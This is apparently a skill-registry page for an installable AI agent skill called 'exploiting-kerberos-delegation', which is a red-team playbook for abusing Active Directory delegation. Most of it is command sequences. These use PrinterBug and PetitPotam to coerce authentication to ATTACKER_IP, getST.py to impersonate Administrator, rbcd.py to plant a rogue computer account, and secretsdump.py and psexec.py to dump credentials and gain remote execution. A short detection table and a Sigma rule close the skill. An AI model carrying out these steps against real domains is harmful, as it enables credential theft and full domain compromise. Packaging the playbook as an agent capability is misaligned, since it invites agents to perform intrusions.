Agent skill
exploiting-kerberos-delegation
Install this agent skill to your Project
npx add-skill https://github.com/majiayu000/claude-skill-registry/tree/main/skills/other/other/exploiting-kerberos-delegation
SKILL.md
name: exploiting-kerberos-delegation description: >- Exploit Kerberos delegation misconfigurations including unconstrained, constrained, and resource-based constrained delegation to impersonate privileged users and escalate domain privileges. domain: cybersecurity subdomain: red-team tags:
- kerberos
- delegation
- active-directory
- privilege-escalation
- impersonation version: "1.0" author: defconxt license: AGPL-3.0 metadata: mitre-attack: ["T1558.001", "T1550.003", "T1134.005"] tools: ["rubeus", "impacket", "krbrelayx", "getST.py"]
Exploiting Kerberos Delegation
Overview
Kerberos delegation allows services to act on behalf of users. Misconfigurations enable attackers to impersonate any user — including Domain Admins — by abusing unconstrained, constrained, or resource-based constrained delegation (RBCD).
Prerequisites
- Domain user credentials
- Network access to Domain Controller (TCP 88/389)
- Impacket (
pip install impacket) - Rubeus (Windows) or krbrelayx (Linux)
pip install impacket krbrelayx
Key Concepts
Delegation Types
| Type | Risk | Attribute |
|---|---|---|
| Unconstrained | Critical | TrustedForDelegation |
| Constrained | High | msDS-AllowedToDelegateTo |
| RBCD | High | msDS-AllowedToActOnBehalfOfOtherIdentity |
Ticket Types
| Ticket | Purpose |
|---|---|
| TGT | Ticket-Granting Ticket — proves identity |
| TGS | Ticket-Granting Service — access specific service |
| S4U2Self | Request ticket to yourself on behalf of user |
| S4U2Proxy | Forward ticket to target service |
Workflow
Step 1: Find Delegation-Enabled Accounts
# Impacket — find unconstrained delegation
findDelegation.py corp.local/user:'Pass123' -dc-ip 10.10.10.1
# LDAP query for constrained delegation
ldapsearch -H ldap://10.10.10.1 -D "[email protected]" -w 'Pass123' \
-b "DC=corp,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo
# Find RBCD targets
ldapsearch -H ldap://10.10.10.1 -D "[email protected]" -w 'Pass123' \
-b "DC=corp,DC=local" "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" sAMAccountName
Step 2: Exploit Unconstrained Delegation
# Force authentication via PrinterBug/PetitPotam
printerbug.py corp.local/user:'Pass123'@DC01 ATTACKER_IP
PetitPotam.py ATTACKER_IP DC01
# Capture TGT with krbrelayx
krbrelayx.py --krbsalt corp.local -aesKey AES_KEY
# Use captured TGT
export KRB5CCNAME=DC01\$.ccache
secretsdump.py -k -no-pass DC01.corp.local
Step 3: Exploit Constrained Delegation
# Request impersonated TGS via S4U
getST.py -spn cifs/target.corp.local -impersonate Administrator \
corp.local/svcaccount:'SvcPass123' -dc-ip 10.10.10.1
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass target.corp.local
# With NTLM hash
getST.py -spn cifs/target.corp.local -impersonate Administrator \
-hashes :NTHASH corp.local/svcaccount -dc-ip 10.10.10.1
Step 4: Exploit RBCD
# Add controlled computer account
addcomputer.py -computer-name EVIL\$ -computer-pass 'EvilPass123' \
corp.local/user:'Pass123' -dc-ip 10.10.10.1
# Set RBCD attribute on target
rbcd.py -delegate-to TARGET\$ -delegate-from EVIL\$ -action write \
corp.local/user:'Pass123' -dc-ip 10.10.10.1
# Get impersonated ticket
getST.py -spn cifs/TARGET.corp.local -impersonate Administrator \
corp.local/EVIL\$:'EvilPass123' -dc-ip 10.10.10.1
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass TARGET.corp.local
Detection Opportunities
| Signal | Source | Description |
|---|---|---|
| Event 4769 | DC Security | TGS with delegation flag set |
| Event 4768 | DC Security | TGT request from delegation account |
| S4U2Proxy | DC Security | Service-for-user ticket operations |
| New computer | Event 4741 | Machine account creation (RBCD) |
title: Potential RBCD Attack — New Computer Account
id: b2c3d4e5-6f70-8901-bcde-f12345678901
status: experimental
logsource:
product: windows
service: security
detection:
selection:
EventID: 4741
filter:
SubjectUserName|endswith: "$"
condition: selection and not filter
falsepositives:
- Authorized SCCM or MDM enrollment
level: high
tags:
- attack.t1134.005
- attack.privilege_escalation
Verification
- Delegation-enabled accounts discovered
- Delegation type identified (unconstrained/constrained/RBCD)
- Impersonation ticket obtained
- Privileged access confirmed
- Detection artifacts documented
References
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
agent-ops-spec
Manage specification documents in .agent/specs/. Use when user provides requirements, acceptance criteria, or feature descriptions that need to be tracked and validated against implementation.
agent-ops-state
Maintain .agent state files. Use at session start, after meaningful steps, and before concluding: read/update constitution/memory/focus/issues/baseline consistently.
agent-ops-spec
Manage specification documents in .agent/specs/. Use when user provides requirements, acceptance criteria, or feature descriptions that need to be tracked and validated against implementation.
agent-ops-testing
Test strategy, execution, and coverage analysis. Use when designing tests, running test suites, or analyzing test results beyond baseline checks.
agent-ops-testing
Test strategy, execution, and coverage analysis. Use when designing tests, running test suites, or analyzing test results beyond baseline checks.
agent-ops-state
Maintain .agent state files. Use at session start, after meaningful steps, and before concluding: read/update constitution/memory/focus/issues/baseline consistently.
Didn't find tool you were looking for?